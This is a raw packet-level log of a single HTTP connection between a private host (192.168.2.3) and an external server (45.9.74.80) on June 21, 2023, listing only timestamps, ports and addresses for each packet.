Jun 21, 2023 04:27:57.613611937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613656044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613702059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613748074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613769054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613811970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613831997 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613874912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613922119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613940954 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613986015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.614032030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.614051104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.614094019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.614140987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.614161968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.614206076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.614340067 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.639472008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639628887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639677048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639734983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639750004 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.639796972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639842033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639889002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.639909983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.639954090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.639971972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640018940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640067101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640086889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640130043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640183926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640197992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640239000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640279055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640326023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640371084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640391111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640433073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640486002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640500069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640544891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640589952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640644073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640659094 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640701056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640721083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640764952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640810013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640832901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640877962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640933037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.640954971 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.640996933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641045094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641066074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641108990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641155958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641207933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641222954 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641266108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641319036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641334057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641369104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641396046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641442060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641495943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641510963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641552925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641607046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641622066 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641664982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641710043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641762972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641810894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641855955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641901016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.641922951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.641964912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642011881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642034054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.642065048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.642095089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642141104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642187119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642205954 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.642249107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642303944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642318964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.642362118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.642430067 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.667601109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667651892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667699099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667745113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.667768955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667813063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667841911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.667879105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667923927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.667944908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.667989016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668034077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668056011 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668101072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668145895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668168068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668215990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668278933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668303967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668349981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668395042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668415070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668459892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668509007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668555021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668575048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668618917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668670893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668687105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668731928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668759108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668797970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668852091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668868065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.668910980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668956995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.668988943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669028997 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669051886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669075012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669120073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669166088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669189930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669230938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669277906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669329882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669344902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669388056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669440985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669459105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669492006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669523001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669569969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669621944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669636965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669680119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669730902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669745922 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669786930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669831991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669873953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669893980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.669936895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.669982910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670005083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670046091 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670066118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670111895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670161009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670176029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670221090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670265913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670286894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670331001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670378923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670424938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670448065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670491934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670542955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670557022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670591116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670618057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670664072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670716047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670732021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670773983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670825005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670840025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.670883894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670931101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670983076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.670996904 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671040058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671086073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671106100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671143055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671166897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671212912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671264887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671279907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671323061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671369076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671391010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671433926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671482086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671534061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671547890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671592951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671646118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671694994 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671730042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671757936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671803951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671849012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671895981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671927929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.671955109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.671981096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672002077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672036886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672063112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672108889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672156096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672202110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672221899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672286034 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672305107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672350883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672403097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672416925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672461033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672514915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672528982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672571898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672617912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672668934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672684908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672723055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672746897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672791958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672837973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672858000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.672903061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672955036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.672969103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673011065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673057079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673109055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673122883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673167944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673221111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673235893 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673279047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673297882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673341990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673384905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673405886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673449039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673500061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673515081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673558950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673604012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673657894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673672915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673717976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673768997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673784018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673826933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673880100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.673896074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673928976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.673958063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674005032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674058914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674072981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674117088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674169064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674182892 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674226046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674274921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674319983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674343109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674386978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674433947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674457073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674491882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674520016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674566984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674612999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674634933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674678087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674721956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674745083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674777985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674806118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674850941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674902916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.674917936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.674961090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.675014973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.675029993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.675064087 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.675606966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700455904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700522900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700556040 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700602055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700634003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700680017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700731039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700746059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700783014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700799942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700820923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700870991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700885057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700917006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.700942039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.700983047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701021910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701042891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701064110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701101065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701121092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701164961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701203108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701219082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701261044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701309919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701323032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701356888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701380014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701423883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701447964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701488018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701528072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701548100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701584101 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.701605082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.701647997 CEST	80	49719	45.9.74.80	192.168.2.3
